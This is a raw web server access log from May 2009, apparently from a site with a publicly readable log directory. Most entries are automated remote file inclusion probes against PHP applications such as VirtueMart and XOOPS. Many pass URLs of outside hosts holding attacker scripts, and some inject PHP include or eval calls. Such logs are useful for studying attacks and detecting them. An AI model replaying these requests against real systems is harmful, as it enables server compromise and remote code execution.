207.57.79.26 - - [13/May/2009:03:57:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
124.0.73.2 - - [13/May/2009:03:57:55 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
124.0.73.2 - - [13/May/2009:03:57:55 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
217.18.76.16 - - [13/May/2009:03:58:05 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:03:58:06 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
207.57.79.26 - - [13/May/2009:03:58:29 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:58:29 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
66.249.67.180 - - [13/May/2009:03:59:09 -0500] "GET /logs/access_log.1111449600 HTTP/1.1" 200 125 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.57.79.26 - - [13/May/2009:03:59:24 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:03:59:24 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
93.187.232.189 - - [13/May/2009:04:02:11 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:04:02:11 -0500] "GET //config/dbutil.bck.php?confdir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
84.32.195.2 - - [13/May/2009:04:02:32 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:04:02:33 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:04:02:33 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.208.143 - - [13/May/2009:04:03:32 -0500] "GET /logs/access_log.1154131200 HTTP/1.1" 200 2114 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:04:03:36 -0500] "GET /logs/access_log.1187913600 HTTP/1.1" 200 778 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:04:04:25 -0500] "GET /logs/access_log.1123286400 HTTP/1.1" 200 456 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.54.200 - - [13/May/2009:04:04:58 -0500] "GET /logs/canhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 336 "-""libwww-perl/5.813"
94.23.54.200 - - [13/May/2009:04:04:58 -0500] "GET /canhttp://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 331 "-""libwww-perl/5.813"
96.9.152.214 - - [13/May/2009:04:05:22 -0500] "GET //modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
96.9.152.214 - - [13/May/2009:04:05:22 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
96.9.152.214 - - [13/May/2009:04:05:22 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
96.9.152.214 - - [13/May/2009:04:05:22 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.187.232.189 - - [13/May/2009:04:06:20 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:04:06:21 -0500] "GET //config/dbutil.bck.php?confdir=http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
207.57.79.26 - - [13/May/2009:04:06:49 -0500] "GET /logs/errors.php?error=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:04:06:49 -0500] "GET /errors.php?error=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
91.121.210.42 - - [13/May/2009:04:06:54 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
91.121.210.42 - - [13/May/2009:04:06:54 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.210.42 - - [13/May/2009:04:06:54 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
69.237.82.158 - - [13/May/2009:04:08:07 -0500] "GET /logs/errors.php?error=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:04:08:11 -0500] "GET /errors.php?error=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
66.249.67.180 - - [13/May/2009:04:09:42 -0500] "GET /logs/access_log.1206057600 HTTP/1.1" 200 1851 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.64.202.135 - - [13/May/2009:04:10:42 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:04:10:42 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:04:10:42 -0500] "GET //modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.202.135 - - [13/May/2009:04:10:42 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:04:10:58 -0500] "GET /logs/access_log.1131840000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.146.231.207 - - [13/May/2009:04:13:07 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.146.231.207 - - [13/May/2009:04:13:07 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.146.231.207 - - [13/May/2009:04:13:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.146.231.207 - - [13/May/2009:04:13:34 -0500] "GET /logs/access_log.1231804800//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.208.143 - - [13/May/2009:04:14:05 -0500] "GET /logs/access_log.1189814400 HTTP/1.1" 200 1822 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:04:14:18 -0500] "GET /logs/access_log.1138924800 HTTP/1.1" 200 628 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:04:15:01 -0500] "GET /logs/access_log.1193961600 HTTP/1.1" 200 2522 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [13/May/2009:04:16:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.143.98.5 - - [13/May/2009:04:16:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.117.191.71 - - [13/May/2009:04:18:21 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 189190 "-""libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:04:18:21 -0500] "GET /?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
217.18.76.16 - - [13/May/2009:04:19:11 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 189190 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:19:11 -0500] "GET /?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
211.110.19.178 - - [13/May/2009:04:19:13 -0500] "GET //skin/zero_vote/login.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.110.19.178 - - [13/May/2009:04:19:13 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/login.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.110.19.178 - - [13/May/2009:04:19:13 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.103.144 - - [13/May/2009:04:19:36 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 189190 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:04:19:36 -0500] "GET /?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.825"
66.249.67.180 - - [13/May/2009:04:20:17 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 200 3395 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.135.14 - - [13/May/2009:04:20:21 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 189190 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:04:20:21 -0500] "GET /?DOCUMENT_ROOT=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
201.234.41.5 - - [13/May/2009:04:20:22 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:04:20:23 -0500] "GET //?path%5Bdocroot%5D=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
211.144.136.88 - - [13/May/2009:04:20:32 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:04:20:32 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:04:20:32 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.144.136.88 - - [13/May/2009:04:20:32 -0500] "GET /logs/access_log.1235606400//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.176.196.171 - - [13/May/2009:04:20:45 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:04:20:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
213.175.201.250 - - [13/May/2009:04:20:54 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:20:54 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:20:54 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:20:58 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:20:58 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:20:58 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:04:23:13 -0500] "GET /logs/access_log.1231804800//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
213.175.201.250 - - [13/May/2009:04:24:19 -0500] "GET /logs/access_log.1235606400//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
62.178.197.14 - - [13/May/2009:04:25:31 -0500] "GET /logs//admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:04:25:34 -0500] "GET /logs/access_log.1145836800 HTTP/1.1" 200 1189 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.178.197.14 - - [13/May/2009:04:25:50 -0500] "GET //admin/classes/errors.php?error=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
213.175.201.250 - - [13/May/2009:04:26:08 -0500] "GET /logs/access_log.1235606400//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.98.212.6 - - [13/May/2009:04:29:56 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
118.98.212.6 - - [13/May/2009:04:29:56 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.98.212.6 - - [13/May/2009:04:29:56 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:04:30:54 -0500] "GET /logs/access_log.1137456000 HTTP/1.1" 200 1829 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.101.159.29 - - [13/May/2009:04:35:04 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:04:35:04 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:04:35:04 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:04:35:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:04:35:07 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:04:35:07 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
88.84.128.40 - - [13/May/2009:04:35:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:04:35:29 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
121.101.159.29 - - [13/May/2009:04:35:30 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:04:35:30 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:04:35:31 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:04:35:59 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
66.249.67.180 - - [13/May/2009:04:36:10 -0500] "GET /logs/access_log.1187222400 HTTP/1.1" 200 1712 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.84.128.40 - - [13/May/2009:04:39:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:04:39:17 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
216.176.196.171 - - [13/May/2009:04:41:18 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:04:41:18 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
118.98.212.6 - - [13/May/2009:04:41:19 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
118.98.212.6 - - [13/May/2009:04:41:19 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.98.212.6 - - [13/May/2009:04:41:19 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:04:41:25 -0500] "GET /logs/access_log.1124496000 HTTP/1.1" 200 341 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.56.98 - - [13/May/2009:04:43:15 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 292 "-""libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:04:43:15 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 287 "-""libwww-perl/5.48"
67.204.0.222 - - [13/May/2009:04:44:26 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:04:44:26 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
69.94.56.98 - - [13/May/2009:04:45:34 -0500] "GET /environment.php?DIR_PREFIX=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 286 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
66.249.67.180 - - [13/May/2009:04:46:43 -0500] "GET /logs/access_log.1156291200 HTTP/1.1" 200 2296 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.114.132.122 - - [13/May/2009:04:50:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:04:50:43 -0500] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:04:50:46 -0500] "GET /logs//?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 189195 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:04:50:47 -0500] "GET //?path%5Bdocroot%5D=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
74.55.156.2 - - [13/May/2009:04:51:56 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.820"
74.55.156.2 - - [13/May/2009:04:51:56 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.820"
66.249.67.180 - - [13/May/2009:04:52:01 -0500] "GET /logs/access_log.1199059200 HTTP/1.1" 200 1437 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.106.135.14 - - [13/May/2009:04:52:44 -0500] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:04:52:45 -0500] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:52:53 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:04:52:54 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
91.121.210.42 - - [13/May/2009:04:53:41 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.210.42 - - [13/May/2009:04:53:41 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.121.210.42 - - [13/May/2009:04:53:41 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
91.121.210.42 - - [13/May/2009:04:53:41 -0500] "GET /logs/access_log.1236816000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
